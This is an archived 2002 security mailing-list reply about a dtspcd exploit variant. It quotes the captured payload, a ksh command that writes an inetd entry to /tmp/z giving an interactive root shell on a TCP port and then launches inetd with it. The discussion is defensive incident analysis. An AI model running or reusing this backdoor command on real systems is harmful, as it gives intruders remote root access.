On Thu, 14 Feb 2002 16:07:10 EST, "Nathan W. Labadie" <ab0781at_private> said: > Until last week, all the dtspcd exploits I'd seen had been the same > (inetd, ingreslock, /tmp/x, etc). Looks like there is a new one floating > around. The ASCII output looks something like this: > > /bin/ksh -c echo 'rje stream tcp nowait root /bin/sh sh -i'> /tmp/z; > /usr/sbin/inetd -s /tmp/z; > sleep 10; Hmm... hardly new. Somebody's retrofitted a /tmp/bob onto a new delivery vector, it looks like (though I've not check the capture)... -- Valdis Kletnieks Computer Systems Senior Engineer Virginia Tech
This archive was generated by hypermail 2b30 : Fri Feb 15 2002 - 08:28:34 PST